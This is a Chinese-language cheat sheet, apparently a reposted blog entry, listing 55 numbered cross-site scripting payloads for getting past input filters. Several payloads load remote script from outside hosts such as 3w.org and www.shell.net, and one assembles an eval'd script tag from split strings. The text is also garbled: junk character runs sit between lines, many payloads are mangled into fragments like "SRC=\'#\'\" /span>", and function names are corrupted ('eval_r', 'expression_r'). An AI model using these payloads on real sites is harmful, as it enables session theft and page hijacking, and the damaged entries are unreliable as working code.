XSS攻击汇总

admin

(1)普通的XSS JavaScript注入
/ ~) B" X! f/ J<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! b+ g% i; k  I2 B' k(99)另类弹框
<q/oncut=alert()>1
<s/onclick=alert()>b
2 \1 U( h5 Y4 E# A! E& a <XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
! H  Q' ^) q  R3 I5 M$ X<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ I, T  Q7 H# t3 Z
& _. k/ J* p- d* `(3)IMG标签无分号无引号
3 d( E+ z" c  j: V! B<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感
# v$ Z! Q3 |  S1 Y: d/ b<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: ?* n' }; n8 e4 }( i
(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>
) L+ I8 y1 H7 P. A
(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

( s  ?% u4 [* O; ]% A(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

9 q9 C5 `1 P1 {/ k$ K(10)十六进制编码也是没有分号(计算器)
<IMG SRC=\'#\'" /span>

(11)嵌入式标签,将Javascript分开
# I6 j+ A, `) s0 O<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
, n) |: |/ x: @
' M; G6 a' Q" F3 C( N3 F! V7 W6 P(12)嵌入式编码标签,将Javascript分开
' w4 c( E5 r6 J' _1 J2 X<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 A; n- o9 T* \/ a% P. b/ O
(13)嵌入式换行符
9 R. f$ r# l- N2 Z2 Q# y<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

, p  L+ ~$ e/ E" Y5 J) Y8 }(14)嵌入式回车
" }8 R+ w* n" K$ Z' ]1 A2 U! k<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

8 C  L, }, T8 ~* p(15)嵌入式多行注入JavaScript,这是XSS极端的例子
) ?1 B8 \. g' X3 G<IMG SRC=\'#\'" /span>
  A: O# ~7 g' T8 s
(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
& d: t- {/ z0 f5 ]" o5 [<script>z=z+’.net/1.’</script>
  [& m# f' @* O+ I, F<script>z=z+’js></sc’</script>
1 p( O0 D, f3 t) z<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>
$ `& l1 \5 h; s
  v" B) W$ C& y! E2 l' q(17)空字符
- W% [& t+ c, R3 T% C) C! |perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 T9 X8 o/ m$ m
(19)Spaces和meta前的IMG标签
- s: H& u9 K9 p; u7 T<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS
) u/ E6 ?# c! _) z2 C, K<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
4 r9 c, l+ U! T2 i3 E$ b
0 J4 |( b; N4 @(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

% w  {# C) R5 M6 _(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
8 |9 c% ]5 n1 m# C! z$ [  _/ t  j
(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>

. d8 w2 x( C, p  \6 o(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
" f# X/ n/ a# N$ K6 C* i! S- f
2 F& B/ w( W0 n! |% o3 ?(25)无结束脚本标记2
, \( \+ ?- c- a4 U  l<SCRIPT SRC=//3w.org/XSS/xss.js>
6 _! t5 O. z6 @& v- }+ f' V
9 ^  F  ]5 t$ M1 w(26)半开的HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>
2 Z1 Q4 B5 L5 \, P. v$ Q0 i
(27)双开角括号
& Y4 {1 W  J( q- o, F<iframe src=http://3w.org/XSS.html <
7 @, V9 S, o( \! Z* X
(28)无单引号 双引号 分号
& \4 |9 t5 `: \+ E' H: }<SCRIPT>a=/XSS/
" j/ ?6 F1 a6 q9 r  Jalert(a.source)</SCRIPT>
3 q7 Y6 n" _' i) o" c4 @& i# Y
(29)换码过滤的JavaScript
\”;alert(‘XSS’);//
9 p5 Q" q1 k8 z
(30)结束Title标签
" ]) b. ~9 d  J" ?</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
+ \- f! T5 T+ [! H
% {% |7 O& s; \) H5 c/ ~(31)Input Image
" r: X0 }9 J+ R* K<INPUT SRC=\'#\'" /span>

. f& U" w1 ?1 o$ K6 X( o6 `5 k" r(32)BODY Image
/ M  y( P3 [# U1 B; U( j<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
5 V; J4 h% B) O8 t
(33)BODY标签
<BODY(‘XSS’)>

(34)IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>
( s! N% I$ Y+ w/ k
(35)IMG Lowsrc
6 O" x: P3 a$ N- }<IMG LOWSRC=\'#\'" /span>
& o$ A8 d: _8 M3 X- M3 ~& h7 z
(36)BGSOUND
0 c9 b5 g8 R# O/ {- y' [<BGSOUND SRC=\'#\'" /span>
) L7 e/ P5 h6 c2 V
(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
( f" D0 x/ l% `% @
(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

' v% p4 `2 A- t6 ^(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

0 Z6 I. U& B. i& d# q(40)IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
' }- Y* ?# \; I! T& k9 l
1 L3 W) ?9 v$ ]* w  a$ F( q" d" T(41)META链接url
8 A6 O) h# N4 q, E8 \. W  T# _/ j<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 X# E9 ]2 P, G! h5 c# a, @
) d7 v4 A& D+ W9 l" V; `(42)Iframe
0 j& p5 l+ p8 _# p9 i( E<IFRAME SRC=\'#\'" /IFRAME>
5 @8 A* w$ ~& R- v
4 g; K0 ?) c, q! j(43)Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
4 s4 |1 i) q, [  s, L' ^" @+ _: v6 W
- N7 c3 s- U, _0 W* R(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
8 q# T9 @& [8 \; ]
  }! [- X3 I3 ^4 {8 \(46)DIV background-image
# u! T& r. V" f9 I0 F<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
$ a0 L7 w& z% F& t6 v/ ~* H
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=”background-image: url(
javascript:alert(‘XSS’))”>
: n4 P* X" W9 `, \
(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 s6 g# y7 I( r/ {
(49)STYLE属性分拆表达
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

# @- y3 ?0 C% S( Y! D- ?5 A' k(50)匿名STYLE(组成:开角号和一个字母开头)
! F( t4 r$ {+ x+ o<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

0 \) m% O! L+ p- F7 s(51)STYLE background-image
  u1 X2 _7 [/ W. [+ {& Z0 `2 W, N<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式
exppression(alert(“XSS”))’>
' P) _! }4 \8 @6 S* O7 }0 r) @
(53)STYLE background
; X. C6 \; l- y8 `. j3 v<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* j7 Z, _) I5 Y. Y
# Q' F+ r/ @" f7 o9 l0 z; j( q(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>
2 C5 Z4 W& P2 c9 j
# v# a2 O+ M+ U(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
/ Z; D$ w; p, n" F6 J<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>